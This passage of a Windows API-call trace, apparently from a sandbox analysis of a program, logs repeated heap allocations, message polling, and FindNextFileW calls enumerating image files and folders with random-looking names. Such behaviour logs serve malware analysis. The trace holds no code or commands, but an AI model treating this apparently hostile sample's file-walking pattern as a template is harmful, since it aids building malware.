lpMsg=0x8bf620) returned 0 [0254.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0254.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0254.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0254.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0254.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0254.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0254.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0254.379] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0254.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0254.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0254.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0254.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0254.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b3500 [0254.379] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0254.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0254.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0254.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0254.379] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0254.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0254.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0254.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.380] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef3db00, ftCreationTime.dwHighDateTime=0x1d4ca4a, ftLastAccessTime.dwLowDateTime=0xe8dbd680, ftLastAccessTime.dwHighDateTime=0x1d4cd31, ftLastWriteTime.dwLowDateTime=0xe8dbd680, ftLastWriteTime.dwHighDateTime=0x1d4cd31, nFileSizeHigh=0x0, nFileSizeLow=0x4c04, dwReserved0=0x34aa370, dwReserved1=0x25c6e50, cFileName="70BY_GgaY1.bmp", cAlternateFileName="70BY_G~1.BMP")) returned 1 [0254.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0254.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0254.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0254.380] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0254.380] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0254.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0254.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0254.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0254.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0254.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0254.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0254.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0254.380] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0254.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0254.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0254.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0254.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0254.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0254.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0254.381] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0254.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0254.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0254.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0254.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0254.381] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0254.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0254.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0254.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0254.381] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x34aa6a0, dwReserved1=0x25c6e50, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0254.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0254.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0254.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0254.381] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.381] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0254.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0254.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0254.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0254.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0254.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0254.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0254.382] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0254.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0254.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0254.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0254.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0254.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0254.382] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0254.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0254.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0254.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0254.382] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0254.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0254.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0254.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.383] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba4be920, ftCreationTime.dwHighDateTime=0x1d4c90a, ftLastAccessTime.dwLowDateTime=0x9548a390, ftLastAccessTime.dwHighDateTime=0x1d4c80e, ftLastWriteTime.dwLowDateTime=0x9548a390, ftLastWriteTime.dwHighDateTime=0x1d4c80e, nFileSizeHigh=0x0, nFileSizeLow=0x7dc5, dwReserved0=0x34aa4d8, dwReserved1=0x25c6e50, cFileName="E3PCt.png", cAlternateFileName="")) returned 1 [0254.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0254.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0254.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0254.383] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0254.383] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0254.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0254.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0254.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0254.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0254.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0254.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0254.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0254.383] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0254.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0254.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0254.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0254.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0254.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0254.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0254.384] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0254.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0254.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0254.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0254.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0254.384] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0254.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0254.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0254.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0254.384] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9bb25a0, ftCreationTime.dwHighDateTime=0x1d4d05b, ftLastAccessTime.dwLowDateTime=0xb8b24da0, ftLastAccessTime.dwHighDateTime=0x1d4d06e, ftLastWriteTime.dwLowDateTime=0xb8b24da0, ftLastWriteTime.dwHighDateTime=0x1d4d06e, nFileSizeHigh=0x0, nFileSizeLow=0x7712, dwReserved0=0x34aa370, dwReserved1=0x25c6e50, cFileName="FSvM9zg.png", cAlternateFileName="")) returned 1 [0254.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0254.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0254.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0254.385] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.385] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0254.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0254.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0254.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0254.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0254.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0254.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0254.385] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0254.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0254.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0254.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0254.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0254.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0254.385] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0254.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0254.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0254.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0254.386] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0254.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0254.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0254.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.386] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b88900, ftCreationTime.dwHighDateTime=0x1d4c9fc, ftLastAccessTime.dwLowDateTime=0x1460dbf0, ftLastAccessTime.dwHighDateTime=0x1d4c7e4, ftLastWriteTime.dwLowDateTime=0x1460dbf0, ftLastWriteTime.dwHighDateTime=0x1d4c7e4, nFileSizeHigh=0x0, nFileSizeLow=0xbacb, dwReserved0=0x34aa6a0, dwReserved1=0x25c6e50, cFileName="FWAReLHUsSkJL.bmp", cAlternateFileName="FWAREL~1.BMP")) returned 1 [0254.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0254.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b34c8 [0254.386] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.386] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.386] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.386] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.386] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.386] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0fec740, ftCreationTime.dwHighDateTime=0x1d4c6bb, ftLastAccessTime.dwLowDateTime=0xc5750b60, ftLastAccessTime.dwHighDateTime=0x1d4c5bd, ftLastWriteTime.dwLowDateTime=0xc5750b60, ftLastWriteTime.dwHighDateTime=0x1d4c5bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x34aa4d8, dwReserved1=0x25c6e50, cFileName="itO8mb4FwKJbnFD", cAlternateFileName="ITO8MB~1")) returned 1 [0254.386] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.387] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.387] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.387] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.387] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.387] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf3f0b60, ftCreationTime.dwHighDateTime=0x1d4d475, ftLastAccessTime.dwLowDateTime=0x8abfc350, ftLastAccessTime.dwHighDateTime=0x1d4cda8, ftLastWriteTime.dwLowDateTime=0x8abfc350, ftLastWriteTime.dwHighDateTime=0x1d4cda8, nFileSizeHigh=0x0, nFileSizeLow=0x695b, dwReserved0=0x34aa370, dwReserved1=0x25c6e50, cFileName="JP0X848xky.gif", cAlternateFileName="JP0X84~1.GIF")) returned 1 [0254.387] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.387] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.387] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.387] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.387] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.387] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4476fe0, ftCreationTime.dwHighDateTime=0x1d4d126, ftLastAccessTime.dwLowDateTime=0xfda7ffb0, ftLastAccessTime.dwHighDateTime=0x1d4c996, ftLastWriteTime.dwLowDateTime=0xfda7ffb0, ftLastWriteTime.dwHighDateTime=0x1d4c996, nFileSizeHigh=0x0, nFileSizeLow=0x94b9, dwReserved0=0x34aa6a0, dwReserved1=0x25c6e50, cFileName="krvo L5sveZ W.png", cAlternateFileName="KRVOL5~1.PNG")) returned 1 [0254.387] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.387] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.387] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.387] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.388] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.388] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf040940, ftCreationTime.dwHighDateTime=0x1d4c68e, ftLastAccessTime.dwLowDateTime=0xe93e2810, 